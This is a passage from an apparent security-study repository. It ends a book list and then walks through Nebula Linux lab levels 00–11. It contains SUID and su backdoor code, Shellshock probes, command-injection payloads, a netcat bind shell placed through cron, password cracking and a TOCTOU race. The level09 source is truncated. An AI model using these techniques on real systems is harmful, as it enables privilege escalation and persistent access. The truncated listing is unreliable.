* [Social Engineering in IT Security: Tools, Tactics, and Techniques by Sharon Conheady, 2014](https://www.mhprofessional.com/product.php?isbn=0071818464)

## Lock Picking Books
* [Practical Lock Picking by Deviant Ollam, 2012](https://www.elsevier.com/books/practical-lock-picking/ollam/978-1-59749-989-7)
* [Keys to the Kingdom by Deviant Ollam, 2012](https://www.elsevier.com/books/keys-to-the-kingdom/ollam/978-1-59749-983-5)
* [CIA Lock Picking Field Operative Training Manual](https://www.scribd.com/doc/7207/CIA-Lock-Picking-Field-Operative-Training-Manual)
* [Lock Picking: Detail Overkill by Solomon](https://www.dropbox.com/s/y39ix9u9qpqffct/Lockpicking%20Detail%20Overkill.pdf?dl=0)
* [Eddie the Wire books](https://www.dropbox.com/sh/k3z4dm4vyyojp3o/AAAIXQuwMmNuCch_StLPUYm-a?dl=0)

## OSINT Books

* [Complete Guide to Shodan](https://leanpub.com/shodan)
* [A Search Engine Backed by Internet-Wide Scanning - Ariana Mirian](https://censys.io/static/censys.pdf)

# Links

If you want to read more, try the following URLs and search for what interests you.

1. http://www.amazon.com/
2. http://search.oreilly.com/openbook/
3. http://www.slideshare.net/
4. http://packtlib.packtpub.com/
5. https://leanpub.com/
6. https://en.wikibooks.org/wiki/Main_Page
7. http://gen.lib.rus.ec/
8. http://it-ebooks.info/
9. http://www.phrack.com/
10. http://www.net-security.org/insecuremag.php
11. https://www.goodreads.com/

--------------------------------------------------------------------------------
/CTFS/Nebula/README.md:
--------------------------------------------------------------------------------

# exploit-exercises Nebula walkthrough

#### Site:
https://exploit-exercises.com/nebula
http://vulnhub.com/entry/exploit-exercises-nebula-v5,31/


#### About

Nebula takes the participant through a variety of common (and less than common) weaknesses and vulnerabilities in Linux.
It takes a look at 11 | 12 | SUID files 13 | Permissions 14 | Race conditions 15 | Shell meta-variables 16 | $PATH weaknesses 17 | Scripting language weaknesses 18 | Binary compilation failures 19 | 20 | At the end of Nebula, the user will have a reasonably thorough understanding of local attacks against Linux systems, and a cursory look at some of the remote attacks that are possible. 21 | 22 | 23 | #### Getting started 24 | 25 | ##### Levels 26 | 27 | Have a look at the levels available on the side bar, and log into the virtual machine as the username “levelXX” with a password of “levelXX” (without quotes), where XX is the level number. 28 | 29 | Some levels can be done purely remotely. 30 | 31 | 32 | ##### Getting root: 33 | 34 | In case you need root access to change stuff (such as key mappings, etc), you can do the following: 35 | 36 | Log in as the "nebula" user account with the password "nebula" (both without quotes), followed by "sudo -s" with the password "nebula". You'll then have root privileges in order to change whatever needs to be changed. 
37 | 38 | ``` 39 | level19@nebula:~$ su nebula 40 | Password: 41 | nebula@nebula:/home/level19$ id 42 | uid=1000(nebula) gid=1000(nebula) groups=1000(nebula),4(adm),20(dialout),24(cdrom),46(plugdev),108(lpadmin),109(sambashare),110(admin) 43 | nebula@nebula:/home/level19$ sudo -s /bin/bash 44 | [sudo] password for nebula: 45 | root@nebula:/home/level19# id 46 | uid=0(root) gid=0(root) groups=0(root) 47 | ``` 48 | 49 | #### Workthrough 50 | 51 | * Contents: 52 | * level00 ---- find a Set User ID program 53 | * level01 ---- env hijacking 54 | * level02 ---- command injection (c) 55 | * level03 ---- scheduler 56 | * level04 ---- bypass filename limit with a symbolic 57 | * level05 ---- get ssh perms from backup files 58 | * level06 ---- crack Unix/linux os user password 59 | * level07 ---- command injection (perl) 60 | * level08 ---- packet analysis (tcpdump) 61 | * level09 ---- code injection (php) 62 | * level10 ---- time-of-use to time-of-check or TOCTOU bug 63 | * level11 ---- command injection (c) 64 | * level12 ---- command injection (lua) 65 | * level13 ---- prog debug (c) 66 | * level14 ---- decrypt 67 | * level15 ---- compile a shared library in linux 68 | * level16 ---- command injection (perl) 69 | * level17 ---- pickle bug 70 | * level18 ---- bypass login auth (c) 71 | * level19 ---- process security 72 | 73 | Linux os/shell/command/security 74 | level00/level01/level03/level04/level05/level06/level08/level10 75 | 76 | c/perl/lua/php/python 77 | level02/level07/level09/level11/level12/level13/level14/level15/level16/level17/level18/level19 78 | -------------------------------------------------------------------------------- /CTFS/Nebula/level00.md: -------------------------------------------------------------------------------- 1 | # Level00 2 | 3 | #### About 4 | 5 | This level requires you to find a Set User ID program that will run as the “flag00” account. 
You could also find this by carefully looking in top level directories in / for suspicious looking directories.
Alternatively, look at the find man page.
To access this level, log in as level00 with the password of level00.


#### Source code

There is no source code available for this level


#### Solutions

```
1. find / -perm -u+s -uid `id -u flag00` -type f 2>/dev/null
   find / -perm -4000 -uid `id -u flag00` -type f 2>/dev/null
   find / -type f -perm -4000 -uid `id -u flag00` -exec md5sum {} \; 2>/dev/null
   ----> 4d0a23fc7855e3dc128c76e18beb11b1 /bin/.../flag00
   ----> 4d0a23fc7855e3dc128c76e18beb11b1 /rofs/bin/.../flag00

2. /bin/.../flag00
3. getflag
```

The directory is literally called `...`, which is why it is easy to overlook in a listing; /rofs is the read-only squashfs image the live system is layered on (see the mount output below), so the same binary shows up twice.

#### SUID backdoor
```
su root
cp /bin/bash /tmp/rootshell
chmod u+s /tmp/rootshell
su [someuser]
/tmp/rootshell -p        # bash resets an effective uid that differs from the real uid unless started with -p
```
```
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>

int main()
{
	seteuid( 0 );   // ---- Ubuntu/...
	setuid( 0 );
	system( "/bin/sh" );

	return 0;
}
```
```
#define _GNU_SOURCE
#include <unistd.h>

int main()
{
	setresuid(0, 0, 0);
	execl("/bin/sh", "sh", (char *)NULL);   /* execve() needs argv and envp; execl() is the short form */
	return 1;
}
```

#### Recommend

A. How to find SUID or SGID files?

    find / -perm 755     # permission bits are exactly 755
    find / -perm -4000   # all of the listed bits are set, i.e. the SUID bit is present
    find / -perm /4000   # any of the listed bits is set

    rwx rwx rwx
    111 111 111


-perm mode
Exact match. mode is an octal number or a symbolic mode; if fewer than three octal digits are given, the missing leading digits are taken as 0. For example -perm g=w matches only files whose mode is exactly 0020 (group write is the only bit set). The '/' and '-' forms are what you normally want, e.g. -perm -g=w matches every group-writable file.

File's permission bits are exactly mode (octal or symbolic). Since an exact match is required, if you want to use this form for symbolic modes, you may have to specify a rather complex mode string.
For example -perm g=w will only match files which have mode 0020 (that is, ones for which group write permission is the only permission set). It is more likely that you will want to use the `/' or `-' forms, for example -perm -g=w, which matches any file with group write permission. See the EXAMPLES section for some illustrative examples.


-perm -mode
Every bit set in mode must be set on the file. With a symbolic mode you must name 'u', 'g' or 'o'.

All of the permission bits mode are set for the file. Symbolic modes are accepted in this form, and this is usually the way in which you would want to use them. You must specify `u', `g' or `o' if you use a symbolic mode. See the EXAMPLES section for some illustrative examples.


-perm /mode
Any bit set in mode may be set on the file. With a symbolic mode you must name 'u', 'g' or 'o'. If no bits are set in mode, the test matches every file (consistent with -perm -000).

Any of the permission bits mode are set for the file. Symbolic modes are accepted in this form. You must specify `u', `g' or `o' if you use a symbolic mode. See the EXAMPLES section for some illustrative examples. If no permission bits in mode are set, this test matches any file (the idea here is to be consistent with the behaviour of -perm -000).


-perm +mode
Deprecated: the old way of matching any of the bits in mode, equivalent to -perm /mode.

Deprecated, old way of searching for files with any of the permission bits in mode set. You should use -perm /mode instead. Trying to use the `+' syntax with symbolic modes will yield surprising results. For example, `+u+x' is a valid symbolic mode (equivalent to +u,+x, i.e. 0111) and will therefore not be evaluated as -perm +mode but instead as the exact mode specifier -perm mode and so it matches files with exact permissions 0111 instead of files with any execute bit set. If you found this paragraph confusing, you're not alone - just use -perm /mode.
This form of the -perm test is deprecated because the POSIX specification requires the interpretation of a leading `+' as being part of a symbolic mode, and so we switched to using `/' instead.


    find /tmp -name core -type f -print | xargs /bin/rm -f      # delete files named core under /tmp
    find /tmp -name core -type f -print0 | xargs -0 /bin/rm -f  # same, but safe for names containing spaces, quotes or newlines
    find /sbin /usr/sbin -executable \! -readable -print        # executable but unreadable files
    find /tmp -type f -exec md5sum {} \; 2>/dev/null            # run a command on every match

#### Questions

* How do you find SUID programs?
* How do you turn a SUID binary into a backdoor?
* File permissions and mount options (mount / fstab)

The transcript below shows why a SUID shell copied to /tmp is a poor backdoor on this box: /tmp is already mounted nosuid, so the kernel ignores the setuid bit there, and once it is also remounted noexec (as /etc/fstab asks for) the file cannot be executed at all.

```
root@nebula:/home/level00# mount
/cow on / type overlayfs (rw)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
fusectl on /sys/fs/fuse/connections type fusectl (rw)
udev on /dev type devtmpfs (rw,mode=0755)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
/dev/sr0 on /cdrom type iso9660 (ro,noatime)
/dev/loop0 on /rofs type squashfs (ro,noatime)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
tmpfs on /tmp type tmpfs (rw,nosuid,nodev)
none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
none on /run/shm type tmpfs (rw,nosuid,nodev)

root@nebula:/home/level00# cat /etc/fstab
overlayfs / overlayfs rw 0 0
tmpfs /tmp tmpfs nosuid,noexec,nodev 0 0

root@nebula:/home/level00# mount -o remount,noexec /tmp

root@nebula:/home/level00# mount
/cow on / type overlayfs (rw)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
fusectl on /sys/fs/fuse/connections type fusectl (rw)
udev on /dev type devtmpfs (rw,mode=0755)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
/dev/sr0 on /cdrom type iso9660 (ro,noatime)
/dev/loop0 on /rofs type squashfs (ro,noatime)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
tmpfs on /tmp type tmpfs (rw,noexec,nosuid,nodev)
none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
none on /run/shm type tmpfs (rw,nosuid,nodev)

root@nebula:/home/level00# ls /tmp/
root.c  rootshell  tmux-1001

root@nebula:/home/level00# /tmp/rootshell
bash: /tmp/rootshell: Permission denied
```

# level01

#### About

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.


#### Source code
```
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
	gid_t gid;
	uid_t uid;
	gid = getegid();
	uid = geteuid();

	setresgid(gid, gid, gid);
	setresuid(uid, uid, uid);

	system("/usr/bin/env echo and now what?");
}
```

The binary runs as flag01 and calls `env echo`, so `echo` is looked up through the caller's PATH: put a directory you control first in PATH, with an `echo` of your choosing in it.

#### Solutions
```
cd /home/level01/
export PATH=/home/level01:$PATH
ln -s /bin/getflag /home/level01/echo
/home/flag01/flag01
```

#### SU backdoor
```
vim ~/.bashrc
++ alias su=/tmp/su_backdoor
su
Password:
```

#### Recommend

env
env [OPTION]... [NAME=VALUE] [COMMAND [ARGS]...]
Run COMMAND in a modified environment. 'VARIABLE=VALUE' sets VARIABLE to VALUE; VALUE may be empty, but setting a variable to the empty string is not the same as removing it. Assignments are processed left to right, so a later assignment to the same variable overrides an earlier one. If no COMMAND is given, env prints the environment, like printenv.

Exit status:

    0   ---- if no COMMAND is specified and the environment is output
    125 ---- if `env' itself fails
    126 ---- if COMMAND is found but cannot be invoked
    127 ---- if COMMAND cannot be found
    the exit status of COMMAND otherwise


source
source filename [arguments]

source reads and executes filename in the current shell, so the functions and variables it defines end up in the current script or interactive session. It is the way a script can change the calling environment; export only reaches child processes.
Example: `source ~/.bashrc` is the same as `. ~/.bashrc` (running `~/.bashrc` as a program would execute it in a child shell and change nothing).


BASH shellshock


CVE-2014-6271

    env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id

CVE-2014-6277

    will segfault if vulnerable

    env X='() { x() { _; }; x() { _; } <<a; }' bash -c :

# Level02

#### Source code
```
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
	char *buffer;

	gid_t gid;
	uid_t uid;

	gid = getegid();
	uid = geteuid();

	setresgid(gid, gid, gid);
	setresuid(uid, uid, uid);

	buffer = NULL;

	asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
	printf("about to call system(\"%s\")\n", buffer);

	system(buffer);
}
```

USER comes straight from the caller's environment and is pasted into a string that system() hands to /bin/sh, so shell metacharacters in it are executed as flag02.

#### Solutions
```
export USER="level02|/bin/getflag"
/home/flag02/flag02
about to call system("/bin/echo level02|/bin/getflag is cool")
You have successfully executed getflag on a target account
```

#### Recommend

Python execute os command
```
os.system(cmd)
subprocess.call(cmd, shell=True)

p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
out, err = p.communicate()
```
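level01 and level02 share one root cause: a setuid program passes its caller's environment to a shell. The following is an added example, not code from the original page or from Nebula; it models the two C programs in Python 3 so the effect can be reproduced without the VM. `level01_vulnerable`, `level02_vulnerable`, `level02_hardened`, `demo`, the fake `echo` script, the temporary directory and the payload strings are all constructed here, and /usr/bin/env, /bin/echo and /bin/sh are assumed to exist.

```python
"""Environment-driven command injection (Nebula level01 / level02).

Added example, not from the original page.  The two C programs are modelled
in Python 3: a setuid binary inherits its caller's environment, so PATH and
USER are attacker input.  /usr/bin/env, /bin/echo and /bin/sh are assumed to
exist (true on the Nebula VM and on ordinary Linux hosts).
"""
import os
import subprocess
import tempfile

SAFE_ENV = {"PATH": "/usr/bin:/bin"}  # assumption: a fixed, trusted search path


def level01_vulnerable(inherited_env):
    """system("/usr/bin/env echo and now what?"): env resolves `echo` via PATH."""
    proc = subprocess.run("/usr/bin/env echo and now what?", shell=True,
                          env=inherited_env, capture_output=True, text=True)
    return proc.stdout.strip()


def level02_vulnerable(inherited_env):
    """asprintf("/bin/echo %s is cool", getenv("USER")) followed by system()."""
    cmd = "/bin/echo %s is cool" % inherited_env.get("USER", "")
    proc = subprocess.run(cmd, shell=True, env=inherited_env,
                          capture_output=True, text=True)
    return proc.stdout.strip()


def level02_hardened(user):
    """Same message without a shell: argv list, fixed PATH, USER is only data."""
    proc = subprocess.run(["/bin/echo", user, "is", "cool"], env=SAFE_ENV,
                          capture_output=True, text=True)
    return proc.stdout.strip()


def demo():
    """Constructed scenario: attacker-controlled PATH with a fake `echo` first."""
    with tempfile.TemporaryDirectory() as tmp:
        fake_echo = os.path.join(tmp, "echo")   # stands in for `ln -s /bin/getflag echo`
        with open(fake_echo, "w") as f:
            f.write("#!/bin/sh\necho HIJACKED\n")
        os.chmod(fake_echo, 0o755)
        attacker_env = {
            "PATH": tmp + ":/usr/bin:/bin",      # export PATH=/home/level01:$PATH
            "USER": "level02; echo INJECTED",    # export USER="level02|/bin/getflag"
        }
        return {
            "level01": level01_vulnerable(attacker_env),
            "level02": level02_vulnerable(attacker_env),
            "level02_hardened": level02_hardened(attacker_env["USER"]),
        }


if __name__ == "__main__":
    for name, out in demo().items():
        print("%-16s -> %r" % (name, out))
```

The hardened form keeps USER as a single argv element, so the `;` never reaches a shell, and it pins PATH instead of trusting the inherited one; in the real setuid binaries the equivalent is to use an absolute path plus execve() with a fixed environment rather than system().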
# Level03

#### About

Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes.

To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.


#### Source code

There is no source code available for this level
```
cat /home/flag03/writeable.sh
#!/bin/sh

for i in /home/flag03/writeable.d/* ; do
	(ulimit -t 5; bash -x "$i")
	rm -f "$i"
done
```

Anything dropped into the writable /home/flag03/writeable.d/ is run by flag03's cron job (with a 5 second CPU limit) and then deleted.

#### Solutions
```
level03@nebula:~$ cat ./test.sh
#!/bin/sh

/bin/getflag >> /tmp/a.out
level03@nebula:~$ cat ./test1.sh
#!/bin/sh

nc.traditional -v -e /bin/sh -l -p 4444
root@nebula:~# ls /var/spool/cron/crontabs
flag03  root
```

Copy either script into /home/flag03/writeable.d/ and wait for the next cron run: test.sh appends the getflag output to /tmp/a.out, test1.sh instead leaves a shell listening as flag03 on port 4444.

#### Recommend

Linux scheduled tasks / logs / priorities

* One-shot jobs
  at, batch, atq, atrm
  atd ----> at ---- /var/spool/cron/atjobs
                ---- /var/spool/cron/atspool
                ---- /proc/loadavg
                ---- /var/run/utmp
                ---- /etc/at.allow
                ---- /etc/at.deny


* Recurring jobs
  cron ---- crontab ---- /etc/crontab
                    ---- /etc/cron.allow
                    ---- /etc/cron.deny
                    ---- /var/spool/cron/crontabs/*

            ---- /etc/rc.local
```
level03@nebula:~$ cat /etc/rc.local
#!/bin/bash

start-stop-daemon -b -c flag12 -S /home/flag12/flag12.lua -x `which lua`
start-stop-daemon -b -c flag17 -S /home/flag17/flag17.py -x `which python`
/usr/sbin/thttpd -C /home/flag07/thttpd.conf
/usr/sbin/thttpd -C /home/flag16/thttpd.conf

* * * * * command to be executed
- - - - -
| | | | |
| | | | ----- Day of week (0 - 7) (Sunday=0 or 7)
| | | ------- Month (1 - 12)
| | --------- Day of month (1 - 31)
| ----------- Hour (0 - 23)
------------- Minute (0 - 59)

*    ---- every value
,    ---- a list: 1,5,10 means the 1st, 5th and 10th
-    ---- a range: 1-24 means 1 through 24
/n   ---- a step of n
```

# Level04

#### About

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)
To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.


#### Source code
```
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
#include <err.h>

int main(int argc, char **argv, char **envp)
{
	char buf[1024];
	int fd, rc;

	if(argc == 1) {
		printf("%s [file to read]\n", argv[0]);
		exit(EXIT_FAILURE);
	}

	if(strstr(argv[1], "token") != NULL) {
		printf("You may not access '%s'\n", argv[1]);
		exit(EXIT_FAILURE);
	}

	fd = open(argv[1], O_RDONLY);
	if(fd == -1) {
		err(EXIT_FAILURE, "Unable to open %s", argv[1]);
	}

	rc = read(fd, buf, sizeof(buf));

	if(rc == -1) {
		err(EXIT_FAILURE, "Unable to read fd %d", fd);
	}

	write(1, buf, rc);
}
```

The check is on the name passed in argv[1], not on the file that open() eventually returns, so any alias of the token whose path does not contain "token" gets through.

#### Solutions

```
ln -s /home/flag04/token /tmp/target
/home/flag04/flag04 /tmp/target
Output:
06508b5e-8909-4f38-b630-fdb148a848a2

su flag04
Password: <-- 06508b5e-8909-4f38-b630-fdb148a848a2
/bin/getflag
```

# Level05

#### About

Check the flag05 home directory.
You are looking for weak directory permissions
To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.


#### Source code

There is no source code available for this level


#### Solutions
```
ls -la /home/flag05/
ls -la /home/flag05/.backup/
cp /home/flag05/.backup/backup-19072011.tgz /tmp/
cd /tmp
tar xvf /tmp/backup-19072011.tgz
ssh -i /tmp/.ssh/id_rsa flag05@127.0.0.1
/bin/getflag
```

The backup archive is readable by everyone and contains flag05's .ssh directory, private key included; that key is accepted for flag05, so it logs you in directly.

#### Recommends
ssh-keygen
---- ssh-keygen -b 2048 -t rsa -C "this is my ssh key" -f ssh_key_file
---- /etc/ssh/moduli
---- /etc/ssh/ssh_config
---- /etc/ssh/sshd_config
---- /etc/ssh/ssh_host_ecdsa_key.pub
---- /etc/ssh/ssh_import_id

# Level06

#### About

The flag06 account credentials came from a legacy unix system.
To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06.


#### Source code

There is no source code available for this level


#### Solutions

```
sed -n '37 p' /etc/passwd > /tmp/crack_pwd
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh

john crack_pwd ----> password: hello
john --show crack_pwd

su flag06 <---- hello
/bin/getflag
```

On a legacy system the password hash sits in the world-readable /etc/passwd (here a 13-character traditional DES crypt) instead of /etc/shadow, so anyone on the box can copy it out and crack it offline.

# Level07

#### About

The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.
To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07.


#### Source code

```
#!/usr/bin/perl

use CGI qw{param};

print "Content-type: text/html\n\n";

sub ping {
	$host = $_[0];

	print("Ping results\n");

	@output = `ping -c 3 $host 2>&1`;
	foreach $line (@output) { print "$line"; }

	print("\n");

}

# check if Host set. if not, display normal page, etc

ping(param("Host"));
```

The Host parameter is interpolated straight into a backtick command, so shell metacharacters in it (`|`, `;`, backticks) are executed by the shell running under the web server's user.

#### Solutions

http://level07-server:7007/index.cgi?Host=127.0.0.1|/bin/getflag
```
cat /home/flag07/thttpd.conf ----> port=7007
nc -v level07-server 7007
GET /index.cgi?Host=127.0.0.1|/bin/getflag HTTP/1.0
```

# Level08

#### About

World readable files strike again. Check what that user was up to, and use it to log into flag08 account.
To do this level, log in as the level08 account with the password level08. Files for this level can be found in /home/flag08.


#### Source code

There is no source code available for this level

* analyse capture.pcap: it holds a telnet login session; dump.txt below is the stream data
* hexdump -C dump.txt <---- http://www.asciitable.com/

```
$ hexdump.exe -C dump.txt
00000000  ff fd 25 ff fc 25 ff fb 26 ff fd 18 ff fd 20 ff  |..%..%..&..... .|
00000010  fd 23 ff fd 27 ff fd 24 ff fe 26 ff fb 18 ff fb  |.#..'..$..&.....|
00000020  20 ff fb 23 ff fb 27 ff fc 24 ff fa 20 01 ff f0  | ..#..'..$.. ...|
00000030  ff fa 23 01 ff f0 ff fa 27 01 ff f0 ff fa 18 01  |..#.....'.......|
00000040  ff f0 ff fa 20 00 33 38 34 30 30 2c 33 38 34 30  |.... .38400,3840|
00000050  30 ff f0 ff fa 23 00 53 6f 64 61 43 61 6e 3a 30  |0....#.SodaCan:0|
00000060  ff f0 ff fa 27 00 00 44 49 53 50 4c 41 59 01 53  |....'..DISPLAY.S|
00000070  6f 64 61 43 61 6e 3a 30 ff f0 ff fa 18 00 78 74  |odaCan:0......xt|
00000080  65 72 6d ff f0 ff fb 03 ff fd 01 ff fd 22 ff fd  |erm.........."..|
00000090  1f ff fb 05 ff fd 21 ff fd 03 ff fc 01 ff fb 22  |......!........"|
000000a0  ff fa 22 03 01 00 00 03 62 03 04 02 0f 05 00 00  |..".....b.......|
000000b0  07 62 1c 08 02 04 09 42 1a 0a 02 7f 0b 02 15 0f  |.b.....B........|
000000c0  02 11 10 02 13 11 02 ff ff 12 02 ff ff ff f0 ff  |................|
000000d0  fb 1f ff fa 1f 00 b1 00 31 ff f0 ff fd 05 ff fb  |........1.......|
000000e0  21 ff fa 22 01 03 ff f0 ff fa 22 01 07 ff f0 ff  |!.."......".....|
000000f0  fa 21 03 ff f0 ff fb 01 ff fd 00 ff fe 22 ff fd  |.!..........."..|
00000100  01 ff fb 00 ff fc 22 ff fa 22 03 03 e2 03 04 82  |......".."......|
00000110  0f 07 e2 1c 08 82 04 09 c2 1a 0a 82 7f 0b 82 15  |................|
00000120  0f 82 11 10 82 13 11 82 ff ff 12 82 ff ff ff f0  |................|
00000130  0d 0a 4c 69 6e 75 78 20 32 2e 36 2e 33 38 2d 38  |..Linux 2.6.38-8|
00000140  2d 67 65 6e 65 72 69 63 2d 70 61 65 20 28 3a 3a  |-generic-pae (::|
00000150  66 66 66 66 3a 31 30 2e 31 2e 31 2e 32 29 20 28  |ffff:10.1.1.2) (|
00000160  70 74 73 2f 31 30 29 0d 0a 0a 01 00 77 77 77 62  |pts/10).....wwwb|
00000170  75 67 73 20 6c 6f 67 69 6e 3a 20 6c 00 6c 65 00  |ugs login: l.le.|
00000180  65 76 00 76 65 00 65 6c 00 6c 38 00 38 0d 01 00  |ev.ve.el.l8.8...|
00000190  0d 0a 50 61 73 73 77 6f 72 64 3a 20 62 61 63 6b  |..Password: back|
000001a0  64 6f 6f 72 7f 7f 7f 30 30 52 6d 38 7f 61 74 65  |door...00Rm8.ate|
000001b0  0d 00 0d 0a 01 00 0d 0a 4c 6f 67 69 6e 20 69 6e  |........Login in|
000001c0  63 6f 72 72 65 63 74 0d 0a 77 77 77 62 75 67 73  |correct..wwwbugs|
000001d0  20 6c 6f 67 69 6e 3a 20                          | login: |
000001d8
```

* Password: backd00Rmate

Read the bytes after `Password: ` as keystrokes, not as text: `backdoor`, then three 0x7f bytes (DEL, the user pressing backspace three times, erasing `oor`), then `00Rm8`, one more DEL (erasing the `8`), then `ate`. What the server actually received is `backd00Rmate`; the `Login incorrect` that follows is for the login name, not the password, so this is the string to try with `su flag08`.

# Level09

#### About

There’s a C setuid wrapper for some vulnerable PHP code…
To do this level, log in as the level09 account with the password level09. Files for this level can be found in /home/flag09.


#### Source code

```
", $contents);

	return $contents;
}

$output = markup($argv[1], $argv[2]);

print $output;

?>
```

#### Solutions

1. ----> test.txt
   [email ${${system(getflag)}}]

2. /home/flag09/flag09 test.txt


#### Recommends

Bash/Zsh/fish shell

# Level10

#### About

The setuid binary at /home/flag10/flag10 binary will upload any file given, as long as it meets the requirements of the access() system call.
To do this level, log in as the level10 account with the password level10. Files for this level can be found in /home/flag10.


#### Source code

```
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>

int main(int argc, char **argv)
{
	char *file;
	char *host;

	if(argc < 3) {
		printf("%s file host\n\tsends file to host if you have access to it\n", argv[0]);
		exit(1);
	}

	file = argv[1];
	host = argv[2];

	if(access(argv[1], R_OK) == 0) {
		int fd;
		int ffd;
		int rc;
		struct sockaddr_in sin;
		char buffer[4096];

		printf("Connecting to %s:18211 .. ", host); fflush(stdout);

		fd = socket(AF_INET, SOCK_STREAM, 0);

		memset(&sin, 0, sizeof(struct sockaddr_in));
		sin.sin_family = AF_INET;
		sin.sin_addr.s_addr = inet_addr(host);
		sin.sin_port = htons(18211);

		if(connect(fd, (void *)&sin, sizeof(struct sockaddr_in)) == -1) {
			printf("Unable to connect to host %s\n", host);
			exit(EXIT_FAILURE);
		}

#define HITHERE ".oO Oo.\n"
		if(write(fd, HITHERE, strlen(HITHERE)) == -1) {
			printf("Unable to write banner to host %s\n", host);
			exit(EXIT_FAILURE);
		}
#undef HITHERE

		printf("Connected!\nSending file .. "); fflush(stdout);

		ffd = open(file, O_RDONLY);
		if(ffd == -1) {
			printf("Damn. Unable to open file\n");
			exit(EXIT_FAILURE);
		}

		rc = read(ffd, buffer, sizeof(buffer));
		if(rc == -1) {
			printf("Unable to read from file: %s\n", strerror(errno));
			exit(EXIT_FAILURE);
		}

		write(fd, buffer, rc);

		printf("wrote file!\n");

	} else {
		printf("You don't have access to %s\n", file);
	}
}
```

access() checks the path against the real uid (level10), but open() runs with the effective uid (flag10), and the path is looked up twice. Nothing stops the file behind the path from changing between the two calls, which is the TOCTOU window the two loops below race for.

#### Solutions

```
echo aaaaaaaa>/tmp/token
nc -kl 18211
```

* ---- /tmp/create_link.sh ----
```
#!/bin/bash
while true
do
	ln -fs /tmp/token /tmp/lv10_token
	ln -fs /home/flag10/token /tmp/lv10_token
done
```

* ---- /tmp/connect.sh ----
```
#!/bin/bash
while true
do
	/home/flag10/flag10 /tmp/lv10_token 127.0.0.1
done
```

Run both loops at once; whenever access() sees the link pointing at /tmp/token and open() sees it pointing at /home/flag10/token, the real token is written to the nc listener. Then:

```
su flag10
/bin/getflag
```


#### Recommend

http://cybergibbons.com/security-2/nebula-walkthrough/nebula-exploit-exercises-walkthrough-level10/

# level11

#### About
The /home/flag11/flag11 binary processes standard input and executes a shell command.
There are two ways of completing this level, you may wish to do both :-)
To do this level, log in as the level11 account with the password level11. Files for this level can be found in /home/flag11.


#### Source code

```
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <err.h>
#include <time.h>

/*
 * Return a random, non predictable file, and return the file descriptor for it.
 */

int getrand(char **path)
{
	char *tmp;
	int pid;
	int fd;

	srandom(time(NULL));

	tmp = getenv("TEMP");
	pid = getpid();

	asprintf(path, "%s/%d.%c%c%c%c%c%c", tmp, pid,
		'A' + (random() % 26), '0' + (random() % 10),
		'a' + (random() % 26), 'A' + (random() % 26),
		'0' + (random() % 10), 'a' + (random() % 26));

	fd = open(*path, O_CREAT|O_RDWR, 0600);
	unlink(*path);
	return fd;
}

void process(char *buffer, int length)
{
	unsigned int key;
	int i;

	key = length & 0xff;

	for(i = 0; i < length; i++) {
		buffer[i] ^= key;
		key -= buffer[i];
	}

	system(buffer);
}

#define CL "Content-Length: "

int main(int argc, char **argv)
{
	char line[256];
	char buf[1024];
	char *mem;
	int length;
	int fd;
	char *path;

	if(fgets(line, sizeof(line), stdin) == NULL) {
		errx(1, "reading from stdin");
	}

	if(strncmp(line, CL, strlen(CL)) != 0) {
		errx(1, "invalid header");
	}

	printf("%s",line + strlen(CL));

	length = atoi(line + strlen(CL));

	if(length < sizeof(buf)) {
		if(fread(buf, length, 1, stdin) != length) {
			err(1, "fread length");
		}
		process(buf, length);
	} else {
		int blue = length;
		int pink;

		fd = getrand(&path);

		while(blue > 0) {
			printf("blue = %d, length = %d, ", blue, length);

			pink = fread(buf, 1, sizeof(buf), stdin);
			printf("pink = %d\n", pink);

			if(pink <= 0) {
				err(1, "fread fail(blue = %d, length = %d)", blue, length);
			}
			write(fd, buf, pink);

			blue -= pink;
		}

		mem = mmap(NULL, length, PROT_READ|PROT_WRITE, MAP_PRIVATE, fd, 0);
		if(mem == MAP_FAILED) {
			err(1, "mmap");
		}
		process(mem, length);
	}

}
```


#### Solutions

